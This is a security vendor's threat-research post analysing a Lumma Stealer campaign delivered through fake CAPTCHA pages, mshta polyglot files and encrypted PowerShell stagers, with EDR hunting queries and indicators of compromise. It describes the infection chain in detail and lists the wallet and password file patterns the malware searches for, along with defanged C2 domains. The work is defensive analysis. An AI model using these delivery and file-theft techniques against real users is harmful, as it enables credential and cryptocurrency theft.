Unmasking Lumma Stealer : Analyzing Deceptive Tactics with Fake CAPTCHA
Last updated on: October 21, 2024
Summary
Lumma Stealer is an information-stealing malware available through a Malware-as-a-Service (MaaS). It specializes in stealing sensitive data such as passwords, browser information, and cryptocurrency wallet details. The attacker has advanced its tactics, moving from traditional phishing to fake CAPTCHA verification, exploiting legitimate software to deliver Lumma Stealer. These deceptive delivery methods make Lumma Stealer a persistent threat.
Threat actors frequently create phishing sites hosted on various providers, often leveraging Content Delivery Networks (CDNs). These sites either utilize exploits or trick users into achieving payload execution. The Qualys Threat Research Unit (TRU) has been monitoring an active Lumma Stealer campaign. Recently, we came across the use of fake CAPTCHA pages to trick users into executing the payload. It uses muti-stage fileless techniques to deliver its final payload, which makes this threat deceptive and persistent.
We investigated the entire attack chain, from initial infection to data exfiltration. We assessed the Qualys EDR tool to showcase how it can effectively protect against such threats. We also provided some key threat detection and hunting queries that analysts can incorporate and add to their playbooks, which effectively protect against such threats in real time.
Campaign Analysis
- We speculate that users are redirected to these fake CAPTCHA sites by bad actors exploiting legit software or public-facing applications. When the user clicks the ‘I’m not a robot’ button, verification steps are presented. Completing these steps triggers the execution of a PowerShell command that initiates the download of an initial stager (malware downloader) on the target machine.
Figure 2: Captcha Click and Verification
The webpage code reveals an embedded payload, where a function called ‘verify’ contains a Base64-encoded PowerShell script that is copied to the clipboard when the verification button is pressed.
- Mshta.exe is a trusted Windows tool for running HTML applications and embedded scripts. When a URL is passed to mshta, it downloads a remote payload and places it in the INetCache directory. The downloaded file ‘2ndhsoru’ is a crafted PE file of the Windows tool “Dialer.exe” with script in its overlay section. We dumped the overlay section and extracted the script, which is an obfuscated JavaScript code (fig:7). The payload is using an interesting technique called- polyglot, where valid HTA content is embedded inside other files that are directly executable by mshta. The script’s trigger point is an eval function to execute the JavaScript code. (Figure 8).
Figure 5: Overlay Section of PE
Figure 6: Start of Script in Overlay Section
Figure 7: JS Script in Overlay Section
Figure 8: Mshta Executes the JS Script
- The obfuscated JS script reveals a PowerShell script. This PowerShell script contains an AES-encrypted payload and a routine to decrypt it in CBC mode using a hardcoded decryption key. The script also employs simple arithmetic obfuscation techniques. We have normalized variables and functions in the PS script, revealing how the script downloads and executes the payload (Figure 10).
Figure 9: Encrypted PS Script
- The final PS script downloads ‘K1.zip’ and ‘K2.zip’ into a temporary directory, extracts the contents, and executes “Victirfree.exe” (Lumma Stealer), as shown in Figure 10 above. Below are the contents from DLLs (K1.zip) and “VectirFree.exe” (K2.zip).
- VectirFree.exe employed process hollowing, a common malware tactic used by malware to evade detection. It targeted a legitimate program, “BitLockerToGo.exe,” to inject its malicious payload.
- Additionally, the BitLockerToGo drops files in the temp directory. 72RC2SM21DDZ2OAH3P30V1XPT5AE7YN.exe copies “Killing.bat” and “Voyuer.pif” into the same directory. The bat script was obfuscated, which checks for antivirus processes such as wrsa.exe (Webroot Antivirus Component), opssvc.exe (Quick Heal Antivirus Component), and bdservicehost.exe (Bitdefender), among others, using tasklist and findstr.
- Malware initiates a search for sensitive files and data related to cryptocurrency and password txt files across various directories on the compromised system. It specifically looks for files having keywords that suggest they may hold confidential information, such as *seed*.txt, *pass*.txt, *.kbdx, *ledger*.txt, *trezor*.txt, *metamask*.txt, bitcoin*.txt, *word*, *wallet*.txt
- Lumma Stealer communicates with command and control (C2) servers to exfiltrate stolen data after infecting a system. It tries to connect to C2 server domains with the “.shop” top-level domain (TLD). Currently, these C2 servers are unreachable. As noted earlier, threat actors employ Content Delivery Networks (CDNs) for payload delivery and C2 servers for data exfiltration. In this case, we found the use of Cloudflare CDN, which is included in the Indicators of Compromise (IoC).
How Qualys EDR Protects
Preventing the Threat
The moment PowerShell tries to execute the malicious command on an endpoint, Qualys EDR identifies and prevents the fileless malware attack during the pre-execution stage by terminating the PowerShell instance. This breaks the chain of attack at the initial stage and prevents the downloading of any further malicious payload. Early prevention is crucial in protecting against sensitive data leakage and exfiltration.
Detection and Hunting
Lumma Stealer was executed and analyzed in the Qualys Research environment, where the EDR system was set to detect only.
- The ‘AMSI’ feature in Qualys EDR allows us to view the de-obfuscated code of executed obfuscated scripts. Let’s search for the encoded payload executed by PowerShell. We can see that the argument contains a Base64-encoded payload, and the “Script Content” reveals the corresponding de-obfuscated details.
- Since we know process mshta, which is responsible for communicating to C2 server for further payload delivery. We can filter the events and can see the downloaded file.
- Since we know process mshta, which is responsible for communicating to C2 server for further payload delivery. We can filter the events and can see the downloaded file.
- If we explore that event in the process tree, mshta.exe executes the PS script payload after downloading from the C2.
- By filtering the event with “parent.name:Voyuer.pif“, we see that Voyuer.pif (Autoit.exe) drops “QuantumLink.scr” and “a” (copy of c.a3x).
Figure 26: Operation Performed by Voyuer.pif
- Here are the Qualys Hunting queries that will allow you to investigate the threat.
| Description | Query |
|---|---|
| PowerShell executes embedded code | process.name:”powershell.exe” and process.arguments: [“-e”, “-ec”, “-enc”, “-enco”, “encodedCommand”] |
| PE File created by process (mshta) | process.parentname: mshta.exe and action: created and file.type: PE |
| File created by PowerShell, and it is detected by EPP | parent.name:”powershell.exe” and type: file and event.scoresource: “Anti-malware” |
| Obfuscation technique performed by PowerShell | mitre.attack.technique.id: T1027 and process.name:powershell.exe |
Conclusion
The investigation into Lumma Stealer reveals an evolving threat landscape characterized by the malware’s ability to adapt and evade detection. It employs a variety of tactics, from leveraging legitimate software to utilizing deceptive delivery methods, making it a persistent challenge for security teams. Our analysis of its infection chain highlighted how the fileless malware exploits common tools like PowerShell and mshta.exe, as well as the critical role of embedded payloads and process injection in its operations.
Qualys EDR demonstrates value in detecting and responding to such threats. As you can see, early prevention (Figure 27) can stop this attack chain and its potential impact on an organization.
Figure 27: Threat Chain from EDR
MITRE ATT&CK Techniques
IOCs
Domain
| C2 Domain |
|---|
| futureddospzmvq[.]shop |
| writerospzm[.]shop |
| mennyudosirso[.]shop |
| deallerospfosu[.]shop |
| quialitsuzoxm[.]shop |
| complaintsipzzx[.]shop |
| bassizcellskz[.]shop |
| languagedscie[.]shop |
| celebratioopz[.]shop |
Files
| File Name | Type | Hash (SHA256) |
|---|---|---|
| 2ndhsoru | PE32 | 7d6ee310f1cd4512d140c94a95f0db4e76a7171c6a65f5c483e7f8a08f7efe78 |
| K1.zip | Zip | ca5c90bb87d4cb3e008cf85c2af5ef8b198546586b6b3c50cd00d3e02514e8b8 |
| K2.zip | Zip | 7fbbbfb9a886e43756b705317d3dff3bc0b1698007512d4c42d9df9c955780ce |
| WMSPDMOD.DLL | DLL | 44fe887d10886aa8bbe8232fee270c21992aba9db959f58ebaea348af45e087a |
| WMSPDMOE.DLL | DLL | 2e56b42cf272f55cb3c8ed67245babb70b995d5b86863017fc846a68244b5773 |
| WmsStatusTab.Resources.dll | DLL | 92f31b07a70b98bd4f9e24e94acf10f7ac83cb2b642ca41c8bde147c9295588b |
| WMVCORE.DLL | DLL | 04beac6c1d6023442f94eebe4cdcec11bc47e0a89ec38ba2eb0584d741f8806d |
| WMVDECOD.DLL | DLL | 1cb6b6b1f0889771b740a22f119688e427be00de41e5a9440b2a85940b71396b |
| WMVENCOD.DLL | DLL | 3f4d33bc3402326c72db9ff484cccb929df458ca44b389ce1c505a3f237d23a4 |
| VectirFree.exe | PE64 | 7514d84ca507562a346896ff48a57d1d475f3cfed16e5e6abefd33a97c6323b9 |
| Injected Payload | PE32 | 867a63971c9e09e9f941d839d7ed328a4cdfea2fe985488e7d96bc0b31a34de2 |
| 72RC2SM21DDZ2OAH3P30V1XPT5AE7YN.exe | PE64 | 08f30ece5f7e77a69e58a970b3684c2a0eba1aa203ac97836dad32fc10a15e90 |
| Voyuer.pif (AutoIt.exe) | PE32 | d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd |
| Killing.bat (Obfuscated) | BAT | 432a473f21a57610df93773a79ae94365d6c2b6aa1555123bfdd658a6f28cf2f |
IP
| IP | Usage Type |
|---|---|
| 172.67.209.145 | Cloudflare CDN |
| 104.21.77.155 | Cloudflare CDN |
Contributors
Alisha Kadam, Senior Threat Research Engineer, Threat Research, Qualys
